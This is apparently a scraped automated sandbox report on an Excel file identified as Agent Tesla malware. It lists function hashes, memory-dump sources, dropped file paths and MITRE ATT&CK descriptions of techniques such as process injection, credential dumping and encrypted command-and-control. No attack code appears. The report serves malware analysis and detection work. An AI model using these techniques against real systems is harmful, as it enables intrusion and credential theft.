Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ced1cf1aa6aa89e60ebf308643e6b309cd04d19283a48044fda178cb2ca8e20
Instruction ID: 8d14c5ef73d2cf37b7b41013c2bdc858e10d16d22e5d799ded9316e9d319c454
Opcode Fuzzy Hash: 3ced1cf1aa6aa89e60ebf308643e6b309cd04d19283a48044fda178cb2ca8e20
Instruction Fuzzy Hash: D7F0A434A1030CAFDB04FFF5E49699D77B1ABC0305F9089A9E005AF254EE712F058B91

Function 00260838 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b4bb9ff532502c2678d98a198efd73fafaf9d6d68f3e1567d863e2e7f88d35
Instruction ID: 4df54ce82132e44725cb1d8af657cc7f23a0321c0996f07ab7a267009d228be9
Opcode Fuzzy Hash: d1b4bb9ff532502c2678d98a198efd73fafaf9d6d68f3e1567d863e2e7f88d35
Instruction Fuzzy Hash: 61F06D306152824EEF31CBBC988476A3BD4DB52304F6408A2E045CB583C614ECD0AAD6

Function 0026080F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de25283d4942d4ccadc7c56db42348a9c663a12a37b397bee891f5a939618896
Instruction ID: 30ad4115d0e6658fa8a039056590d9b6e72933134486e6715d76e16deb5b5bf8
Opcode Fuzzy Hash: de25283d4942d4ccadc7c56db42348a9c663a12a37b397bee891f5a939618896
Instruction Fuzzy Hash: D8E0DF62A1D3CB4DEB12667808A43993F508F73344F0900B3C094CF0A3E505899892A5

Function 00260848 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0fee03888d1d7d150df25e955babe46ac9569cc1f817a52a9a9669a9a473ed6
Instruction ID: 34ca44dfd032ce323299c1476d02eda76b5dc52f3b3aa9a2acb68420ffd9d550
Opcode Fuzzy Hash: e0fee03888d1d7d150df25e955babe46ac9569cc1f817a52a9a9669a9a473ed6
Instruction Fuzzy Hash: B5E05E30B202474AFF309AA998C437F3188C761314F600C36E50ACB682DA09CCE076D6

Function 00266958 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc85bb9390b21d2624e0d89d67fba1ea110254ba766869a114d273fa86f77b1d
Instruction ID: aa5b7e4e54a6a3dfe2edbc0d1cf8ee0df3e962b7425e6f91308c44a753047381
Opcode Fuzzy Hash: cc85bb9390b21d2624e0d89d67fba1ea110254ba766869a114d273fa86f77b1d
Instruction Fuzzy Hash: 42D0C934A2230A4BEB201E65AA4D3297758E765315F204C26EC4ACA750E536CCE8C5D2

Non-executed Functions

Function 00469928 Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622139092.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_460000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a354a6c3817b5588e149c0e802d7f473ce6e19377bb9cfb22d8778a4324fd0a
Instruction ID: 20a1a3e9c33031107c9e0adc6f6b2be8939703ebe0eac626d1853341dab5e4bf
Opcode Fuzzy Hash: 9a354a6c3817b5588e149c0e802d7f473ce6e19377bb9cfb22d8778a4324fd0a
Instruction Fuzzy Hash: 5B22D430B001048FDB14DF78D495AAEB7E6FF85310F24846AE406EB391EB75ED428B96

Function 00263EE8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f16da2563635e4999d6de0bfa12300178a5063c3e6b698705890f1ea7eb9f9d8
Instruction ID: 22917e8de8134791bc4473e140cccaed62d7d904cafb2958ea3598b608fdb579
Opcode Fuzzy Hash: f16da2563635e4999d6de0bfa12300178a5063c3e6b698705890f1ea7eb9f9d8
Instruction Fuzzy Hash: E8B17F70E102098FDF14DFA8C8957DEBBF2BF88304F248129E855E7294EB749995CB81

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Fatura 002.xlam.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe

C:\Users\user\AppData\Local\Temp\coolz.exe

C:\Users\user\AppData\Local\Temp\prespecialist

C:\Users\user\Desktop\~$Fatura 002.xlam.xls

C:\Users\user\Desktop\~$Fatura 002.xlam.xlsx

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Fatura 002.xlam.xlsx"

Indicators

Windows Analysis Report
Fatura 002.xlam.xlsx

Function 03670659 Relevance: 3.1, APIs: 2, Instructions: 85
libraryCOMMON

Function 0367072D Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Function 036705CD Relevance: 1.6, APIs: 1, Instructions: 148
filenetworkCOMMON

Function 036705E9 Relevance: 1.6, APIs: 1, Instructions: 132
filenetworkCOMMON

Function 03670673 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Function 036706E2 Relevance: 1.6, APIs: 1, Instructions: 58
filenetworkCOMMON

Function 0367074D Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 03670754 Relevance: .0, Instructions: 14
COMMON

Function 036705B4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre